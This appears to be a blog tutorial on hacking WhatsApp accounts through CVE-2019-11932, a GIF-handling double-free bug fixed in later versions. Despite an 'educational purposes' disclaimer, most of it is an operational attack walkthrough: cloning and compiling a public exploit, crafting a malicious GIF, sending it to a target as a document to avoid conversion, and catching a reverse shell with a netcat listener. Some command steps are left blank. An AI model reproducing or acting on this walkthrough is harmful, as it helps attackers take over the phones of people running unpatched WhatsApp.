Hacking WhatsApp Account is one of the top google search terms for people. It is the most used messaging app in the world. Because of that, there has been a rise for hackers trying to hack WhatsApp in the hacking community. Few hacks work as a paid service while some are free and very few are completely skill-based. With the rise in the number of users, WhatsApp Exploits and security breaches have increased tremendously. So we decided to make a guide on hacking WhatsApp with GIF Hack.
Obviously, this post is only for educational purposes but it shows how hackers can hack WhatsApp accounts using only using a gif file. Whatsapp has since fixed this bug with the latest update but if you have not updated to the latest version then chances are you are still vulnerable to this hack and hackers could benefit from this WhatsApp Exploit.
How to hack WhatsApp with a gif file:
Step 1: Copy and clone the exploit from GitHub with the following command:
git clone https://github.com/awakened1712/CVE-2019-11932
Step 2: Change the Directory to the exploit folder with the following command:
Step 3: Compile the exploit with the following command:
gcc -o exploit egif_lib.c exploit.c
Step 4: Download any gif file from the internet. I am going to use a cat.gif since everyone loves cats.
Step 5: Run the exploit with the following command:
Step 6: Now the malicious gif file is ready to use. Simply send this gif file to the target WhatsApp.
You need to copy the cat.gif file and send it as a Document with WhatsApp to another WhatsApp account user.
Note: This file must not be sent directly as a Media file, otherwise WhatsApp will convert the gif file into an MP4 before sending. Thus making the exploit useless. So make sure to send it as a document instead.
Step 7: Open another terminal on Kali Linux and open netcat listner with the following command:
nc -lnvp 4444
Step 8: Once the file is sent as a document and we need to wait for the target victim to open the file and start WhatsApp Exploit:
Step 9: Once the file is opened you will get a reverse shell as shown below.
Its a regular Linux shell so you can pretty much do anything you want from the shell commands. If you want to know more about shell commands read the documentation.
That’s all folks the WhatsApp account of the target is compromised and you have a root shell and can get the full benefit of this WhatsApp exploit.
WhatsApp Vulnerability Explained:
The above vulnerability exists in WhatsApp that is available with ID CVE-2019-11932. You can find a lot of info about how exactly it works on exploitdb. This vulnerability is of the double free vulnerability type, which allows us to execute the desired command on the Android operating system, which we send by sending a gif file in WhatsApp. It causes a buffer overflow giving us a shell to run commands in. As far as I know, this vulnerability works on WhatsApp version 2.19.244 below.